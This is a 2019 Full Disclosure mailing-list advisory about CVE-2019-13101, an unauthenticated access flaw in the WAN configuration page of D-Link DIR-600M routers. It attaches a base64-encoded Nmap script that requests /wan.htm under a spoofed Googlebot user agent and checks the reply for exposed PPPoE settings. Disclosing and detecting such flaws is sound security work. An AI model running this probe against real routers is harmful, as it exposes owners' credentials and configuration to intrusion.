Dlink-CVE-2019-13101
Devendra Solanki <[email protected]> Fri, 9 Aug 2019 10:18:42 +0530
| Newsgroups | gmane.comp.security.fulldisclosure,gmane.comp.security.nmap.devel |
|---|---|
| Message-ID | <CAHkjRpnd=jENrJfVxcFrsTubmCf1PTuhpAU1yhC4v=4Goo85Lg@mail.gmail.com> |
--00000000000034d244058fa7e4f8 Content-Type: text/plain; charset="UTF-8" A remote vulnerability was discovered on D-Link DIR-600M Wireless N 150 Home Router in multiple respective firmware versions. The vulnerability provides unauthenticated remote access to the router's WAN configuration page i.e. "wan.htm", which leads to disclosure of sensitive user information including but not limited to PPPoE, DNS configuration etc, also allowing to change the configuration settings as well. A Nmap nse script to exploit the vulnerability : https://github.com/d0x0/D-Link-DIR-600M/blob/master/dlink-cve-2019-13101.nse Regards: Devendra Singh Solanki https://twitter.com/_d0x0_ https://github.com/d0x0 --00000000000034d244058fa7e4f8 Content-Type: application/octet-stream; name="dlink-cve-2019-13101.nse" Content-Disposition: attachment; filename="dlink-cve-2019-13101.nse" Content-Transfer-Encoding: base64 Content-ID: <f_jz3mfwx40> X-Attachment-Id: f_jz3mfwx40 CmRlc2NyaXB0aW9uID0gW1sKRGV0ZWN0cyB3aGV0aGVyIHRoZSBELUxpbmsgRElSLTYwME0gb3Ig RElSLTYxNSByb3V0ZXIgaXMgdnVsbmVyYWJsZSB0byBJbmNvcnJlY3QgQWNjZXNzIENvbnRyb2wg VnVsbmVyYWJpbGl0eSAoQ1ZFLTIwMTktMTMxMDEpLgpdXQoKLS0tCi0tIEB1c2FnZToKLS0gbm1h cCAtcCA4MCAtbiAtLW9wZW4gLS1zY3JpcHQgZGxpbmstY3ZlLTIwMTktMTMxMDEgPHRhcmdldD4u Ci0tLQoKYXV0aG9yID0gIkRldmVuZHJhIFNpbmdoIFNvbGFua2kiCmxpY2Vuc2UgPSAiU2FtZSBh cyBObWFwLS1TZWUgaHR0cHM6Ly9ubWFwLm9yZy9ib29rL21hbi1sZWdhbC5odG1sIgoKY2F0ZWdv cmllcyA9IHsiZGlzY292ZXJ5IiwgInZ1bG4iLCAiZXhwbG9pdCJ9ICAgCgpsb2NhbCBodHRwID0g cmVxdWlyZSAiaHR0cCIKbG9jYWwgc2hvcnRwb3J0ID0gcmVxdWlyZSAic2hvcnRwb3J0Igpsb2Nh bCBzdGRuc2UgPSByZXF1aXJlICJzdGRuc2UiCmxvY2FsIHN0cmluZyA9IHJlcXVpcmUgInN0cmlu ZyIKICAgIApwb3J0cnVsZSA9IHNob3J0cG9ydC5odHRwCgpsb2NhbCB1cmkgPSAiL3dhbi5odG0i CgpmdW5jdGlvbiBhY3Rpb24gKGhvc3QsIHBvcnQpCgogICAgbG9jYWwgcmVzcG9uc2UgPSBodHRw LmdldChob3N0LCBwb3J0LCB1cmksCgkgeyBoZWFkZXIgPSB7IFsiVXNlci1BZ2VudCJdID0gIk1v emlsbGEvNS4wIChjb21wYXRpYmxlOyBHb29nbGVib3QvMi4xOyAraHR0cDovL3d3dy5nb29nbGUu Y29tL2JvdC5odG1sKSIgfSB9LCB7IG5vX2NhY2hlID0gdHJ1ZSB9KQoKICAgIGlmKCByZXNwb25z ZS5ib2R5IGFuZCByZXNwb25zZS5zdGF0dXMgPT0gMjAwICkgYW5kIHJlc3BvbnNlLmJvZHk6bWF0 Y2goIlBQUG9FIikgdGhlbgogICAgICAgIHJldHVybiAoIlJvdXRlciBpcyB2dWxuZXJhYmxlIHRv IENWRS0yMDE5LTEzMTAxIikKZW5kCgplbmQKCgoKICAgICAgICAgCg== --00000000000034d244058fa7e4f8 Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Disposition: inline